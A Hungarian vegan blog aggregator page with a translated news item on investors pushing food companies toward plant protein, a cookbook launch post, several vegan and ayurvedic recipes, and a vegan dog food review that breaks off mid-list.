törekvő magáncégnek, a Coller Capital-nak. Az intenzív lábasjószág tartás által kiváltott légszennyezés máris túl magas szinten van, miközben a biztonsági és jóléti nívók túl alacsonyak, és az ipar nem tudja lefedni a globális fehérjeigény tervezett növekedését, mondta Coller.” A befektetők tudni akarják, hogy a vezető élelmiszercégeknek van-e stratégiájuk arra, hogy megkerüljék ezt a fehérjebuborékot, és hogy tudnának-e profitálni egy olyan növényi alapú fehérje eladásból, aminek a mértéke évi 8.4%-os ütemben nőne az elkövetkezendő 5 évben ” – mondta Coller. A kampány egyébként egy oxfordi egyetemi tanulmányt követ, ami kimondja, hogy 2050-ig 1.5 trillió dollárnyi, egészségügyi és klímaváltozással kapcsolatos kiadást lehetne megspórolni, ha az emberek az étkezésükben csökkentenék a húsba vetett bizalmukat. A tanulmány emellett figyelmet szentel a cégekre ható, változást támogató politikai nyomásra, felidézve egy Dániában zajló konzultációt a vöröshús-adó bevezetésével kapcsolatban, vagy a kínai kormány tervét, miszerint 50%-kal csökkentenék polgáraik húsfogyasztását, mondta a FAIRR. Ella McKinley, egy, az Australian Ethical Investment-nél dolgozó etikai elemző – akik egyébként szintén részt vesznek a kampányban – állítja, hogy az élelmiszeripari modell megreformálása elengedhetetlenül fontos a klímaváltozás mérséklésében. Az előrelátó cégek jobban fenntartható irányba mozdulhatnak a húsra való támaszkodás csökkentésével, és növelhetik a növényi alapú fehérjeforrások piacát. Ennek folyamatában a cégek rugalmasabban fogadhatnák azt a sokkot, amit a jelenlegi, nem fenntartható fehérjeforrások krízise a jövőben okozhat. Egyéb cégeknek is írt a FAIRR, mint például a General Mills, a Mondelez International, az Ahold-Delhaize, a The Co-operative Group, a Costco Wholesale Corporation, a Kroeger Company, a Marks & Spencer, a Wm Morrison Supermarkets, az Ocado, a Sainsbury’s és a Whole Foods Market. A Nestlé szóvivője elmondta, a cég nem használ sok húst, “…így a fő stratégiánk nem az, hogy arra összpontosítsunk, hogy mással helyettesítsük a húst, hiszen ennek a hatása minimális lenne. A leglényegesebb lehetőségeink abból állnak, hogy termékeinket alternatív fehérjékkel újítsuk meg. (…) Időhosszban és célokban kifejezve ez egyelőre egy viszonylag új terület, ahol sok országban a fogyasztók nincsenek teljesen felkészülve arra, hogy csökkentség, vagy mással váltsák ki a húst az étkezésükben. Arra összpontosítunk, hogy jó ízű ételeket tudjunk kínálni, ezzel biztatva a fogyasztókat, hogy próbálják ki azokat, majd idővel apró változtatásokat hozzanak egy fenntartható, nagyobb mértékben növényi alapú, kiegyensúlyozottabb étrendért.” A Kraft Heinz elutasította a véleménynyilvánítást, amikor a Reuters megkérdezte. A Co-op azt mondta, még nem kapták meg a levelet. A Mondelez is visszautasította a reagálást, mondván, hogy még nem olvasták a levelet, míg a Sainsbury’s szóvivője szerint “…tudatában vagyunk a helyzetnek, és várjuk a levél érkezését.” A Walmart szóvivője úgy nyilatkozott, hogy a társaság nem volt bizalmas ezzel a kampánnyal, így ők nem biztosíthatnak választ, a Kroeger szóvivője közölte, hogy a vállalat még nem kapta meg a levelet, de boldogan beszélnének a befektető csoporttal. A többi cég nem tudott azonnal reagálni. A kampányhoz még csatlakozott a Nordea vagyonkezelő, a Boston, vagyonkezelő és az Impact vagyonkezelő, valamint számos jótékonysági szervezet és befektető. Fordítás: Biró György Forrás: http://fortune.com/2016/09/26/walmart-meat-sales/ The post A Tescot és más cégeket arra kértek, hogy váltsanak növényi fehérjére appeared first on VegaNinja.
Megjelent a Vegán Reggeli szakácskönyvem!
2016. október 19. Zizi kalandjai
Október 17-én hétfőn délután kaptam a hírt Kingától, a kiadóból, hogy a kezeiben tartja a könyvemet, ami színes, szagos, vidám és csodaszép! Aznap éjszakába nyúlóan dolgoztam és nagyon vártam már a másnap délelőttöt, hogy érezzem én is ennek a több hónapnyi munkának a gyümölcsét a kezeimben!
Nagyon jó érzés volt… igaz nagyobb katarzisra számítottam, de nyilván azt tudtam, hogy mi lesz a könyvben, milyen szöveg, milyen képek, csak azt nem tudtam milyen érzés ezt az egészet könyv formátumban látni papíron! Tényleg, ez a könyv, a harmadik gyerekem lett, egy igazi életmű, ugyanis vasárnap töltöttem be egy szép kerek évfordulót, így ez a könyv ajándék magamnak magamtól!
Dedikálás kis segítséggel
Bevállaltam a dedikálást, így egy óriás adagnyi könyvet dedikáltam ma a kiadóban azoknak, akik eddig megrendelték a könyvet. Ezúton is köszönöm a támogatásotokat, a gratulációtokat és ígérem: most már nem kell sokat várni, hiszen megjelent a könyv és szerdán elindulnak az előrendelt példányok gazdáikhoz, akik pedig a személyes átvételt kérték azok mehetnek érte a kiadóba (most este kiment egy tájékoztató email a részletekről minden előrendelőnek, szóval figyeljétek a postaládátokat!).
A könyv 25%-os, bevezető kedvezményű ára (4990 Ft helyett 3750 Ft!) 2016. október 23-án vasárnap éjfélig tart, ezen a linken tudjátok megrendelni… ha még eszetekbe jut, hogy kit szeretnétek például ezzel a könyvvel meglepni majd karácsonykor!
Még egyszer köszönöm a támogatást a családomnak, I.-nek, Ádinak és Ákinak, hogy türelmesek voltak anyával, valamint a Boook Kiadónak, a kiadó dolgozóinak, Péternek, Hajnalnak, Noéminek, Évának, Tamásnak, Kingának, Ildinek, Matyinak, Milánnak a fotósnak, Áginak a stylistnak, Kármennek a gasztronómiai asszisztensnek, Rékának – aki Ákosra vigyázott és a Biorganik Online Kft-nek, akik támogatták a könyvem megjelenését, valamint a Pipacs Pékségnek – akik biztosítottak kenyeret a fotózáshoz és a Planetbio Magyarországnak – akik a szuperélelmiszereket biztosították a receptek teszteléshez. Na és persze hatalmas köszönet nektek, akik olvassátok a blogomat, kommenteltek, kérdeztek, ötleteket adtok, mert a ti lelkesedéseteknek is hála, hogy ez a könyv most már nem csak álom csupán, hanem egy kézzel fogható színes mű, amit bármikor a kezetekbe vehettek, ha inspirációra van szükségetek a nap indító reggeli vagy brunch készítéséhez.
Ha bárki posztol fotót a könyvről, vagy az elkészült ételről/italról, amit a könyvből készített, akkor használjátok Instagramon és Facebookon is ezeket a hashtageket, mert figyelni fogom őket: #veganreggeliszakacskonyv és #zizibreakfastcookbook. Tervezem, hogy a legjobban készült ételfotókat jutalmazni fogom!
Dedikált példányok egy része…
A másik szuper hír pedig, hogy a Vegán Reggeli mellett megjelent Bede Anna (vegasztrománia) második könyve (szintén a Boook Kiadó gondozásában), a Vega Budapest, ami nem szakácskönyv, hanem 16 népszerű magyar művészt, 16 éttermet és 16 receptet bemutató igazán szórakoztató mű… valami olyasmi, amivel bekuckózhatunk a kanapén egy pohár ital társaságában és észre se vesszük, hogy eltelik az idő az olvasása közben!
Sárgarépa halava
2016. október 17. Élj harmóniában
Beköszöntött az ősz és ilyenkor bizony jobban kívánjuk az édes, zsíros ételeket, mert ezek segítenek a vata minőségét kiegyensúlyozni a szervezetünkben. A halava általában egy búzadarából készült indiai édesség, amiről az ájurvéda azt tartja, hogy forrón fogyasztva a kezdődő megfázást is elmulasztja. Ez a recept sárgarépából készül - így pl. gluténmentes diétába is jól beilleszthető. Ezzel a fűszerezéssel biztosított mindhárom ájurvédikus dósa kiegyensúlyozása. Kapha testtípusok ezt mértékkel fogyasszák és a kapha alkat esetén inkább kecsketejjel készítve javasolt. Kis étkezéseknél desszertnek tudod tálalni, fejenként 1/4 csészényi mennyiséget. Hozzávalók 6 főre 1 csipet sáfrány 1 ek. víz 2 csésze finomra reszelt sárgarépa 6 ek. ghí (tisztítitt vaj ) 1 csésze tej 1/3 csésze cukor (teljes értékű nádcukor) 1/2 tk. őrölt kardamom 1 ek. szeletelt mandula Vegyszermentes (bio) alapanyagokat használj! Áztasd be a sáfrányt az 1 ek. vízbe, minimum 10 percre. Melegítsd fel az edényt közepes lángra és tedd bele a ghít, és add hozzá a sárgarépát. Főzd és keverd kb. 5 percig, amíg a répa nem lesz illatos és enyhén barnás színű. Folyamatosan keverve add hozzá a tejet, aztán a beáztatott sáfrányt és utána a többi hozzávalót is. Főzd alacsony lángon fedő nélkül, amí g minden folyadék elpárolog. ez kb. 12-15 perc. Keverd folyamatosan, hogy ne ragadjon össze és tálalhatod is:)
Omlós diós-lekváros keksz (vegán)
2016. október 4. Zizi kalandjai
Puha, omlós, szájban olvadós kekszek… erre vágysz? Akkor megtaláltad a tuti receptet. Gyorsan elfogyós kekszek, mert mi is és a vendégek is rájárnak. Ezt tapasztaltam, amikor Ádi harmadik szülinapján kipakoltam a kekszeket. Imádom, ahogyan a gyerekek csipegetnek egy svédasztalról. Kivesznek egy olívabogyót a tálkából, beleharapnak, leteszik, mert arrébb meglátnak egy datolyagolyót… beleharapnak, leteszik és már rohannak is játszani. Így volt ez Ádi születésnapján is, én meg jó anya módjára megeszegettem az összes ott maradt darabkát, legyen az egy répa, egy keksz vagy egy datolyagolyó.
I. családjából érkezik ez a keksz recept és mindig azt hallottam, hogy az anyukája milyen finom mini islereket sütött. Szóval ezek lehetnek mini islerek is, ha bevonjuk őket olvasztott csokoládéval, csak mi megkíméltük magunkat és más anyukákat, hogy az olvadt csokit kelljen a gyerekek ruhájáról, kezéről, szájáról, arcáról törölgetni a napsütéses melegben. A tésztája tele van dióval, ettől még finomabb. Két keksz közé pedig házi savanykás sárgabarack lekvár került, de eperrel, szederrel is kiváló… ki, mit talál a kamrájában.
UI: Karácsonyra már most mentsétek el a receptet! Ha sokféle süteményt készítetek, ez legyen az egyik! Sőt, egy doboznyit ajándékba is adhattok!
Omlós diós-lekváros keksz (vegán)
Hozzávalók 20-30 darabhoz:
– 250 g tönköly fehérliszt
– 160 g dió, darálva
– 250 g jó minőségű margarin (hideg legyen!)
– 100 g nád porcukor
– csipet Himalaya só
– sárgabarack lekvár
Melegítsük elő a sütőt 170C fokra. Béleljünk ki egy tepsit sütőpapírral és vékonyan kenjük át kókuszolajjal.
Egy tálba kockázzuk fel a hideg margarint, majd adjuk hozzá a lisztet. Kézzel dolgozzuk morzsás állagúra. Ekkor adjuk hozzá a darált diót, a porcukrot és a csipet sót. Gyúrjuk össze a tésztát. Tegyük lisztezett felületre és nyújtsuk ki 3-4 mm vastagságúra. 3-4 cm átmérőjű pogácsaszaggatóval vágjunk kis köröket a tésztából, tegyük a tepsire és süssük 12-15 percig, amíg aranybarnák lesznek.
Ha kihűltek a keksz körök, vegyünk egyet, kenjük meg lekvárral és “ragasszunk rá” egy másik keksz lapot.
Dobozban, hűvös helyen két hétig elállnak, de úgysem fognak addig tartani.
Tipp : a kekszeket bevonhatjuk csokoládészósszal. Olvasszunk fel vízfürdő felett 100 gramm étcsokoládét és ebbe mártogassuk bele a keksz szendvicsek egyik oldalát. Csokoládészószt készíthetünk úgy is, hogy egy kevés kókuszzsírt felolvasztunk, adunk hozzá kakaóport és ízlés szerint tehetünk bele vaníliát vagy valamilyen édesítőszert (datolyaszirupot vagy nád porcukrot). Jól elkeverjük és belemártogatjuk a keksz szendvicsek egyik oldalát. Hagyjuk a csokit rádermedni, utána tálaljuk.
**********
2016 októberében megjelenő Vegán Reggeli című szakácskönyvem még mindig 25%-os kedvezménnyel rendelhető meg! Remélem ti is annyira várjátok, mint én! Részletekért katt a képre!
Gluténmentes vegán Raffaello golyó
2016. szeptember 29. Vegán lettem
A gluténmentes vegán Raffaello golyó receptjét az Édes Élet Cukrászda ajánlja nektek nagy szeretettel. Glutén, cukor, tej és mindenmentes finomság.
Sokunk örök nagy kedvence a Raffallo golyó. De amikor az ember növényi étrendre vált, vagy gluténmentesen kell táplálkoznia egészségügyi, illetve megelőzési okokból, akkor bizony sok más kedvenc édesség között a Raffello golyókat is el kell hagynia az étrendből. Még szerencse, hogy kis kreativitással minden elkészíthető gluténmentes és vegán módon is, így készülhetett el a gluténmentes vegán Raffello golyó is. Köszönet a receptért Homa Gábor cukrásznak és az Édes Élet Cukrászdának.
Gluténmentes vegán Raffallo golyó hozzávalók:
Fél liter kókusztely
5dkg eritrit
6dkg kukoricakeményítő
6dkg kókuszreszelék
Egy vaníliarúd
30dkg hántolt mandula
Gluténmentes vegán Raffaello golyó elkészítés:
Tedd tűzre forralni a tej 2/3-ad részét, add hozzá az eritritet, a kókuszreszeléket és a vaníliamagot. A tej maradék 1/3-ad részét keverd össze kukoricakeményítővel, és amikor a forrásnak indul a kókusreszelékkel összekevert tej, öntsd hozzá a keményítős 1/3-ad részt. Az összekevert tejet hagyd kihülni, majd gyúrj kis golyócsákat úgy, hogy mindegyik közepére tegyél egy szem mandulát. A gólyocskákat hempergesd kókuszreszelékbe, majd kínáld fel barátaidnak és családodnak új kedvenc édességüket. A panírnak csak a képzeleted szabhat határt. Használhatsz kókuszreszelék helyett, kakaóport, fahéjat, karobport, vagy ezeknek ízlésed szerinti keverékét.
Jó étvágyat!
Édes Élet Cukrászda a weben
Édes Élet Cukrászda a facebookon
Ínyenc vega grill
2016. szeptember 26. Kertkonyha
Van az olyan evés, amikor két hatalmas kanállal pakolja be az ember a szájába a finomságokat. Egy jó, tartalmas, és nem forró leves például nálam ezért kiált. :) De van a másik oldala a dolognak, amit viszonylag későn kezdtem felfedezni: pici darabokat vágva hallani az evőeszközök csilingelését, ízlelgetni a mesés ízeket, amik falatról falatra lesznek egyre kifejezőbbek, és teszik így egyre élvezetesebbé az ebédet.
Na, ez az ínyenc vega grill pontosan ilyen. :) Pecsenyés illatok, édeskés, gyümölcsös aromák, és a látvány.. egyszerűen mesés!
Ez a receptem megjelent a 108.hu Magazin 64. számában is.
Hozzávalók 2-3 adaghoz
[...] Bővebben!
Egyszerű édesburgonya
Hihetetlen egyszerű étel, ami túl sok erőfeszítést nem igényel. Joker-ételem, mert szinte csak batáta és sütő kell hozzá. Ha van itthon édesburgonya, gyakran készítek belőle hasonló eljárással finom vacsorát, főleg, ha nincs kedvem/erőm a tűzhely mellett tenni-venni. Szóval ajánlom ezt az ételt nem csak fáradt, munkából hazaérkezők számára, de azoknak is, akik kifogynak az ötletekből. Ha kisebb szemű édeskrumplival készíted, gyorsabban kész, kb. 30 perc alatt. Nagyobbak esetében akár 40-45 perc sütés is szükséges. A benne lévő természetes ízanyagnak köszönhetően már nincs szükség vaj vagy só hozzáadásához, magában is szuper étel, ráadásul 1,5-2 g/100 g fehérje található benne, amelynek összetétele a tojáséhoz hasonló. Egy perui kutatóközpont, a Limában működő Nemzetközi Burgonyaközpont (CIP) szerint a batátának gazdag ásványi anyagtartalma miatt daganatmegelőző hatása is van, csökkenti a gyomorrák és a májbetegségek kockázatát és antioxidánsai, vitaminjai és proteinjei segítenek megőrizni a fiatalságot.
A recept
Hozzávalók:
- 4 közepes méretű batáta (vagy akár több)
- provanszi fűszerkeverék vagy rozmaring (opcionális)
- sütő
Elkészítés:
Az édesburgonyákat alaposan megmossuk, hosszában félbe vágjuk őket és papírral bélelt sütőlapra helyezzük őket. Méretüktől függően 20-30-40 percig sütjük őket. Akkor készülnek el igazán finomra, amikor a batáta húsa elválig a héjától. Sütés után fűszerezhetjük egy kevés rozmaringgal vagy provanszi fűszerkeverékkel meghintve, de anélkül is nagyon finom.
Jógikus irányelvek 2.
2016. szeptember 19. Élj harmóniában
A Jóga Szútrákban a niyama -k segítséget adnak ahhoz, hogy a saját viselkedésünkben milyen attitűdök azok, melyek segítik a jógagyakorlást és a személyiségünk fejlesztését. Ezen elvek beépítése az életünkbe hozzájárul ahhoz, hogy az elménk kiegyensúlyozott legyen. A kiegyensúlyozott, békés elme elősegíti a meditációt.
Káposztás subji - ájurvédikus zöldséges főétel
2016. szeptember 13. Élj harmóniában
Itt az ősz és akad káposzta bőven a piacok kínálatában:) Egyáltalán nem drága zöldség és nagyon változatosan elkészíthető. A káposzta az ájurvéda szerint keserű, fanyar és hűsítő. Könnyű és emésztést segítő hatású, serkenti az emésztés tüzét az agnit. A káposzta száraz és megkötő tulajdonságokkal is rendelkezik , ami székrekedést és gázokat okozhat. Káposztás subji Bár ez a recept mindhárom dhosát kiegyensúlyozza, Vataknak ezt mértékkel kell fogyasztani. A kurkuma, hing és a só segítenek csökkenteni azon tulajdonságokat, melyek fokozzák a Vatat. Ez a subji recept, orvosi felhasználását tekintve úgy működik, mint egy enyhe hashajtó. Hozzávalók 1 közepes fej káposzta apróra vágva 2 ek. ghí (tisztítitt vaj vagy vegán változatban kókuszzsír ) 1/2 tk. fekete mustármag 1/2 tk. római kömény 1/4 tk. kurkuma csipet aszafoetida (hing) 1/4 tk. só 1 kis chili Vegyszermentes (bio) alapanyagokat használj! A felvágott káposztát mosd meg kétszer. Melegítsd fel az edényt közepes lángra és tedd bele a ghít, majd a fekete mustármagot - a legjobb ha letakarod, mert amikor kipattog, akkor kiugrálhat az edényedből. Húzd le a tűzről picit az edényt amíg pattog a mustármag, majd add hozzá a római köményt, majd ha pirulni kezdett add hozzá az aszafoetidát, a kurkumát és a chilit. Utána add hozzá a káposztát és a sót,. Keverd össze és tedd rá a fedőt. Tedd takarékra és addig főzd, amíg a káposzta meg nem puhul, de még ropogós marad. (kb. 8-10 perc) Tálalhatod rizzsel vagy chapati kenyérrel - receptet itt találod.
Arrabiata citrommal és vodkával
2016. szeptember 9. Vegán muflon
Újfent két szörnyűséges tévedést kell eloszlatnom: 1. Kistarcsai telekszomszédunk, Kalányos Jóska sosem volt befutott operettszínész Csehszlovákiában, csupán statisztaként szerepelt egyszer egy Háry János-előadásban, szóval senki ne higgyen neki! 2. A veganizmus még véletlenül sem jár kéz a kézben az absztinenciával és a spirituális/bio életvitellel. Ezen sorok írója pl. ezt bizonyítandó, reggelente energiaitallal és denaturált szesszel vegyített azbesztport iszik, melyet előzőleg a mikrohullámú sütőben hevített langymelegre. A következő recept is amolyan DAFKE azok számára, akik hepciás vadszamár jógapózban kezdik a napot, és meggyőződésük, hogy az alkohollal készült ételek hatására láncfűrésszel kergetik majd családjukat a veteményesben. Hozzávalók: 200 g penne 2 db piros chilipaprika kimagozva (természetesen a 7-8 centi hosszú, kevésbé csípős változatról ugatok, mert ha a miniatűr verziót használjuk, megismerkedhetünk azzal az érzéssel, mikor egy üveg sebbenzin elfogyasztása után megnyaljuk a Napot) 3 gerezd fokhagyma 1 citrom héja és leve 1dl vodka 400 gramm aprított paradicsom 1 csokor petrezselyem felaprítva só/bors A tésztát alázatosan feltesszük főni enyhén sós vízben. A felaprított fokhagymát és a hosszában felvágott chilit kevés olívaolajon megpároljuk, majd elemi erejű sistergés közepette hozzáöntjük a vodkát. (A drámai hatást fokozandó, szájjal mi magunk is imitálhatjuk a "ssssssssss!" hanghatást!) Egy-két perc kavargatás után hozzápasszítjuk a paradicsomot, a citromlevet majd komótosan a félig-meddig megfőtt tésztát (ezt ugyanis a paradicsomlében főzzük készre, hoppá!). Sózzuk, borsozzuk, citromhéjat reszelünk rá, hozzáadjuk a petrezselymet, majd összeforgatjuk. Végül a tökéletes esztétikai élmény elérése érdekében meglocsoljuk egy kevés olívaolajjal.
Bébipapi - őszibarackos kukoricakása
Ez is mehet az emlékeztető sorba, hogy mit adjunk a cseppnek. :) Miután előző nap ízlett a leányzónak a kukorica kása, gondoltam megbolondítom őszibarackkal, és együtt kínálom. Bejött neki. Négyszeres vízben meg lehet főzni a kukoricakását sűrű kevergetés mellett negyed óráig. Ha lehűlt, mehet a turmixba, vagy a botmixer alá kb. kétszeres mennyiségű őszibarackkal. Nem hígítja úgy meg, mint a főtt zabpehely, de olyan sűrű sem lesz, mint főtt kölessel. Egyébként, ha nem nagy a lelkesedése a picinek az ilyen papik esetén, meg kell próbálni magát a gyümölcsöt apró falatokban külön kínálni neki, és lehet, hogy boldog eszegetés közben a kását is elnyammogja. Mi a zabpelyhes változattal jártunk így.
AZ ÓRIÁSPANDA LEKERÜLT A VESZÉLYEZTETETT ÁLLATOK LISTÁJÁRÓL
2016. szeptember 6. Vegangster
Az óriáspanda lekerült a veszélyeztetett fajok listájáról köszönhetően az évtizedes természetvédelmi erőfeszítéseknek, ennek ellenére a kínai kormány nem kivánja kevésbé súlyos problémaként kezelni az ország szeretett szimbólumát sújtó populációs kérdést.A Természetvédelmi Világszövetség vasárnapi jelentése szerint a pandák növekvő számban vannak jelen Dél-Kínában, a vadon élő panda populáció 2014-ben 1864 főre ugrott a 2004-ben mért 1596-hez képest, köszönhetően a kínai hivatalok hatékony
Magyarországon kapható vegán kutyaeledelek
A vegán kutyatartás gyakran erőteljes vitákat vált ki. Ez érthető, hiszen négylábú társaink a mi kis szőrös gyerekeink, akiknek a legjobbat szeretnénk. Én is kétkedve fogadtam legelőször, és nem is foglalkoztam a dologgal egy jó ideig. De miután megismertem Anna három tappancsos családtagját, akik vegán életmódon éltek, és elkezdtem kutakodni a témában, meggyőződtem róla, hogy semmi rosszat nem teszek Tódival. Azóta sok vegán kutyával találkoztam, és eddig még senkitől nem hallottam negatív tapasztalatot.
Az első hónapokban különösen odafigyeltem minden szokatlan dologra, de nem hogy romlást nem tapasztaltam, Tódi gyomorsav-problémája is megszűnt, vérképe csodás, 13,5 éves, de rendszeresen 6-8 évesnek nézik. Idősebb vagy túlsúlyos kutyáknak, emésztési illetve szőr- és bőrproblémák esetén egyébként is ajánlott a növényi étrend a könnyen emészthető tápanyagok és a nagyobb mennyiségű rost miatt, allergia esetén pedig a hipoallergén tápok nélkülözhetetlenek. Persze csodát nem tesz ez az étrend sem, nem minden meglévő problémája múlt el, és az idő sajnos neki is fehéríti a pofiját, de egészségi állapota korához képest több mint kielégítő.
Miért vegán?
De miért vegán? Az elv egyszerű: bár szőrös gyerekeink számunkra sokkal fontosabbak, mint a többi állat, de ahogyan nem vernénk meg egy másik gyereket, hogy a játékait elvegyük, és saját gyerekeinknek adjuk, így más állatok életét sem vesszük el, hogy a családtagjainkat tápláljuk. Szerencsére erre nincs is szükség.
Jó ez a kutyának?
A kutyák már nem farkasok, emésztésük (és valljuk be, mindenük) óriási mértékben átalakult, mióta velünk élnek. A növényi tápok jelenléte önmagában is azt sugallja, hogy van rá igény (és biztos vagyok benne, hogy nem az “elvetemült vegánok” miatt, mert a vegánok közül sem mindenki eteti vegánul a kutyáját), az allergiás, szőrproblémás és egyéb egészségügyi esetek sajnos egyáltalán nem ritkák. A tápokat szintetikus vitaminokkal dúsítják, legyen szó bármelyik tápról (kivéve talán a legolcsóbbakat), tehát az nem újdonság, hogy ezeket nem csak a “vadonban” lehet megszerezni. A makrotápanyagok (szénhidrát, fehérje, zsír) pedig, az összes aminosavval együtt megtalálható a növényekben.
Az olcsóbb és közepesen drága húsos tápokba “emberi fogyasztásra nem alkalmas” húsok és egyéb állati és növényi anyagok kerülnek. Ez jelenthet sok mindent, de nem sok jót. Beteg, daganatos állatok, kicsit romlott hús, nem fogyasztható testrészek, szervek (pl. tisztítatlan belek), csontok lisztté őrölve, gyepmesteri telepeken meghalt állatok testei. Ezen kívül olyan adalékanyagokkal “dúsítják” az eledeleket, amik súlyos, akár halálos megbetegedésekhez vezetnek. Mégis, szinte senkit nem érdekel, ha valaki ilyen hulladékkal eteti a kutyáit. Nyilván van, akinek ennél nem telik többre, de sokan csak nem szánnak rá többet, “jólvanaz”. Ezzel szemben a jól megtervezett, bio vegán táp etetése miatt rögtön “állatkínzót” kiált a nép. Éppen arra, aki nem kínoz senkit, ezzel szemben napokat öl bele a tájékozódásba annak érdekében, hogy mindenkinek a legjobb legyen.
A drágább húsos tápokon már sok esetben fel van tüntetve, hogy (kizárólag) emberi fogyasztásra alkalmas húst tartalmaz. Ez viszont azt is jelenti, hogy csak és kizárólag “háziállatok” etetése céljából ölnek meg “haszonállatokat”, nem a melléktermékeket használják fel. De ezek a kategóriák csak a fejünkben léteznek, a malacok okosabbak, mint a kutyák, a szarvasmarhák komplex társas kapcsolatokat tartanak fenn, a tyúkok pedig kb. egy 10 hónapos embergyerek értelmi szintjén vannak. Persze nem a képességeik alapján kellene az élethez való jogukat meghatározni, de így könnyebb elképzelni, mennyire félnek ők is a haláltól, és élni akarnak.
További vegán kutyák listája angolul.
Állatkísérletek
Fontos még szót ejteni az állatkísérletekről. Sajnos nem arról van szó, hogy pár kutyát megkérnek, hogy kóstolják meg az új formulát, ízlik-e nekik.
Az egyik állatkísérlet során 24 fiatal kutyának eltávolították az egyik veséjét, majd a bal veséjüket részlegesen szétroncsolták, hogy megállapítsák, a protein hogyan befolyásolja a vesebeteg kutyákat. Nyolc kutya pusztult el ebben a vesekísérletben.
Forrás: Origo
Állatkísérletes tápok pl.: Hills Pet Nutrition (Colgate-Palmolive), Whiskas, Pedigree, Royal Canin, Sheba, Cesar, Kitekat, Frolic, Chappi, Trill (Mars), Iams, Eukanuba (Procter & Gamble), Tix, Ko-Kra, Romeo, Schnuvki, Chico, Premium, Rufus, Tropic, Purina (Nestlé Purina)
És végül a lényeg: a Magyarországon kapható vegán és vegetáriánus tápok, amiket kipróbáltunk, és amiket (még) nem.
Yarrah Bio Vegán
Amit legelőször kipróbáltunk, az a Yarrah Bio márkájú kutyaeledel. Normál méretű, világos színű és kevéssé olajos kinézetű. Nálunk elfogyott, de láthatóan nem ez volt a kedvence Tódinak. Ennek ellenére olvastam olyan beszámolókat is, ahol a finnyás kutya imádta. A nedves tápjukat és a kutyakekszet viszont nagyon szereti Tódi, ezekről lejjebb olvashatsz.
- Állatkísérlet-mentes cég
- Hipoallergén táp
- 100% vegán
Összetevők: Gabona* (búza*, kukorica*), növényi melléktermékek*, (napraforgómag*, búzadara*), szójabab*, élesztő, ásványi anyagok.
* = Ellenőrzött biológiai termesztésből, Skal 1301
Adalékanyagok:
Tápértékkel rendelkező adalékanyagok:
A-vitamin (15.000 NE/kg), D2-vitamin (1.500 NE/kg), E-vitamin [DL-alfa-tokoferol-acetát] (120 NE/kg.
Kiszerelések: 10 kg
Ár/kg: 1100 Ft
Itt rendelheted meg:
Zooplus.hu
Pitti Boris Vega
Közepesen sötét barna színű táp, olajosabb, mint a Yarrah. Tartalmaz D3-Vitamint, amit gyakran gyapjúból vonnak ki, a gyapjú megszerzése pedig sajnos egy rendkívül erőszakos folyamat (videó erősebb idegzetűeknek). Erről, és az állatkísérletekről megkérdeztem őket, update várható. Sok vitamint tartalmaz, és némi cukorrépát is, amit a kutyák szeretnek, de hogy jó-e nekik, az kétséges.
Összetevők:
Gabona, növényi fehérjekivonatok, növényi melléktermékek, olajok és zsírok, ásványok, magvak, élesztők, cukor.
Nyersanyagok:
Kukoricaglutén (kb. 25%), rizs (kb. 22%), kukorica (kb. 19%), árpa (kb. 15%), rizs-takarmányliszt (kb. 9%), ásványi anyagok (mono-kalcium-foszfát, kalcium-karbonát, nátrium-klorid, kálium.klorid), kukoricaolaj, lenmag, cukorrépa-apríték, élesztők, hidrolizált élesztő-kivoantok, inulin.
Adalékanyagok:
Tápértékkel rendelkező adalékanyagok:
A-vitamin (14.040 NE/kg), D3-vitamin (1.400 NE/kg), C-vitamin (50 mg/kg), E-vitamin (150 mg/kg), B1-vitamin (3,8 mg/kg), B2-vitamin (5,1 mg/kg), B6-vitamin (3,7 mg/kg), B12-vitamin (27 mcg/kg), nikotinsav (42,1 mg/kg), d-pantotens (18,7 mg/kg), biotin (675 mcg/kg), kolin-klorid (675 mg/kg), folsav (0,9 mg/kg), mangán mint mangán-(II)-oxid (36 mg/kg), réz mint réz-(II)-szulfát (10 mg/kg), cink mint cink-oxid (135 mg/kg), vas mint vas-(II)-szulfát (90 mg/kg), kobalt mint kobalt-(II)-szulfát (1 mg/kg), jód mint kálium-jodid (1 mg/kg), szelén mint nátrium-szelenit (0,2 mg/kg), lecitin (3 g/kg).
Kiszerelés: 15 kg
Ár/kg: 700 Ft
Itt rendelheted meg:
Zooplus.hu
Trainer Fitness 3 Vegetal
Ez a legzsírosabb és a legsötétebb színű a 3 közül, Tódi szereti.
- Gabonamentes
- Állatkísérlet-mentes
- Gyümölcsökkel és gyógynövényekkel
Összetevők:
Burgonya (45%), borsófehérje, kukoricaolaj (10%), borsó (7%), burgonyafehérje, ásványi anyagok, lenmag, szárított spenót, bab (2,5%), vegetáriánus eredetű hidrolizált fehérje, FOS (frukto-oligo-szacharidok) (0,3%), ligno-cellulóz, ananász-szár szárazkivonat (0,1%), gojicserje szárazkivonat (0,05%), tengeri alga (schizochytrium spp.) (0,05%).
Adalékanyagok/kg:
Tápértékkel rendelkező adalékanyagok:
A-vitamin (26.000 NE/kg), D3-vitamin (1.350 NE/kg), E-vitamin 555 (mg/kg), kolin-klorid (1.800 mg/kg), DL-metionin (4.100 mg/kg), réz-szulfát pentahidrát (50 mg/kg) [réz] (12,5 mg/kg), vas-karbonát (395 mg/kg) [vas] (150 mg/kg), vízmentes kalcium-jodát (25 mg/kg) [jód] (2,5 mg/kg), nátrium-szelenit (20 mg/kg) [szelén] (0,2 mg/kg), cink-oxid (265 mg/kg) [cink] (195 mg/kg), mangán-II-oxid (55 mg/kg) [mangán] (35 mg/kg).
Kiszerelés: 12,5 kg
Ár/kg: 1 063 Ft
Itt rendelheted meg:
Zooplus.hu
Eledelporta.hu
Green PetFood VeggieDog
Több verziója létezik, itthon a normál és a csökkentett zsírtartalmú kapható. A tápban található D3 vitamin sajnos állati eredetű, de ezen igyekeznek változtatni. A cég nagyon törekszik a fenntartható megoldások népszerűsítésére.
- Papír csomagolás
- Öko felfogású vállalat
- Gyümölcsökkel, gyógynövényekkel, algával
Light (csökkentett zsírtartalmú):
Zsírtartalma éppen a Yarrah és a Pitti Boris között van, színe sötétbarna, alakja lapos korong. Ha a D3-vitamin kérdése megoldódna, ez lenne a kedvenc tápunk, Tódi két másodperc alatt felszippantja az adagját, annyira ízlik neki. A szemek alakja miatt gyenge fogacskáival is el tudja őket roppantani, tele van vitaminokkal, a csomagolása pedig minden etetéskor jó érzéssel tölt el. Szakmai ártalom. :)
Összetevők:
